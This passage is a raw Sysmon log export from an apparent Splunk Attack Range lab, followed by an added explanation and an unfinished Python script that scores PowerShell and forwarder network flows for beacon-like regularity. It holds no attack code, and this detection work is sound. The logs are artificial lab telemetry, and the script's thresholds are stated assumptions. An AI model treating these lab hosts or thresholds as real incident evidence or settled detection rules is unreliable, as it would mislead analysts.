354300x800000000000000036496775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:36.436{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50456-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:06.085{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D1FF1B14CB44DC765E05A20C0B36125,SHA256=326A2E94C07290C9E15D6755B0211DBDCD0793FE8FE42566CBF80A79D9F9773B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A01F-6140-6756-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:07.967{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:07.967{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A01F-6140-6756-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.967{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A01F-6140-6756-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.952{B81B27B7-A01F-6140-6756-04000000C801}6604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:07.101{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D89F62389B6232C9A2226F1F599769D,SHA256=75E71A2CC30E97F7A2AA9B05251344B6B1C95862D3A1864F30A52AE0E65032E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7CBEAC9A14A91AE08178B328A45D6E4,SHA256=BED37D9C73B379216BB1A776B3315013C0329A6BA85F19569FEDC6D80AA593C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2424B89ED02D90BB8444C577F1AFF8E2,SHA256=2BEDE60DDC44A5202EA955C973CF3D744611F9A83FB5B3183C06447FA3B5BEBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A020-6140-6856-04000000C801}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:08.651{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:08.651{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:08.651{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A020-6140-6856-04000000C801}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.651{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A020-6140-6856-04000000C801}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.636{B81B27B7-A020-6140-6856-04000000C801}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.152{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9FBF33845BFFCBB06CACCF8ABEFA6D1,SHA256=5D4A66B6142F371DC136E20B44FBD82E57F0111535751BD423113F60BF8BC158,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:08.136{B81B27B7-A01F-6140-6756-04000000C801}66046608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x800000000000000036496798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:09.900{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3D97AEEA2A21581B5B1F4488C3D51556,SHA256=00030C7559893D4B9EC200E8831A63A1EF904C824733DCBFED344350BA6BDD34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:09.166{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E8659DB93315B9F0A9879DB6C84BE85,SHA256=2118578B9546F0C59429383D5787B93A30F887788AD9A5588F9982FAA87EC23D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:40.448{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50458-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.779{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50457-false10.0.1.12-8000- 23542300x800000000000000036496799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:10.198{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=215CF2C5E9916DCCF4A16CE1866358A3,SHA256=FEC8C2EC76E4FFB590D3923032767DFDBFB2F08F1FFFCBE29D4556F462DC1EE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:11.248{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471ADEB6FCF638AE699E024226342175,SHA256=7353C3E866D41A2C6C47A859B881BF7AAE573DDA796AD856E418C6AE090C4581,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:12.296{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5393739D1520CD0AE4A08DC95D67CF48,SHA256=32C7D6D5AD7BF5E9D700D67F2E1C76C340D92357D5A8E51DC02201F23129ED81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:13.346{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=431BCC180D69C99F464F563EE2CD320B,SHA256=56A9816351019815E9AF3673289CC713139560C4367E7D129832FACF42108372,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:14.994{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6241AFF87DA232CD82A084E9A2030897,SHA256=A9389CF4A6C6EAC9F9B7A516542850DAE1C792A8EF5E5DB4E936909D7436B0A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:14.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81F9369C5F40CD689ABA48A943DF5CEA,SHA256=0E01F524F5EB83E446EE91E01CDCA7E199D92D92E7A3079748D2994928123F98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:15.414{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DF8A8F3CC1988B382FA7782581C13F5,SHA256=F9A5297B2F4C857C13113C5CC432808BA5BB55223B1B6788D05B7B897EA9EE8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
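The records in this export are Sysmon XML events with the tags stripped, so each event is its header (EventID, Version, Level, Task, Opcode, Keywords, EventRecordID, Channel, Computer) followed by the EventData values run together in schema order. Buried in the Event ID 23 file-delete noise from the Splunk forwarder are two periodic outbound flows visible in the Event ID 3 records: powershell.exe under ATTACKRANGE\REED_SCHMIDT to 10.0.1.16:443 every few seconds, and streamfwd.exe under SYSTEM to 10.0.1.12:8000 on a similar cadence. The script below is an added example, not part of the dataset or of any Splunk tooling: it recovers the Event ID 3 fields from the tag-stripped text and scores each (image, user, destination) flow for beacon-like regularity. The eight sample records are copied verbatim from this page (EventRecordID 36496770 through 36496818; the 13:14:30.427 PowerShell connection whose header is cut off at the top of the section is left out). The Sysmon Event ID 3 field order is the real schema; the `0.25` coefficient-of-variation threshold, the three-interval minimum and the `KNOWN_AGENTS` allowlist are assumptions made for the example.

```python
"""Recover Sysmon Event ID 3 (NetworkConnect) records from a tag-stripped XML
export and score each outbound (image, user, destination) flow for beacon-like
regularity. Added example. EventData order for Event ID 3 is Sysmon's schema:
RuleName, UtcTime, ProcessGuid, ProcessId, Image, User, Protocol, Initiated,
SourceIsIpv6, SourceIp, SourceHostname, SourcePort, SourcePortName,
DestinationIsIpv6, DestinationIp, DestinationHostname, DestinationPort,
DestinationPortName. With the tags gone the parser keys on that order and on
literals that cannot appear inside the free-text fields (tcp/udp, true/false,
dotted IPv4 addresses, an Image ending in .exe)."""
import ntpath
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Eight complete Event ID 3 records copied verbatim from the export above
# (EventRecordID 36496770 .. 36496818), one event per string.
RECORDS = [
    r"354300x800000000000000036496770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:33.739{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50455-false10.0.1.12-8000-",
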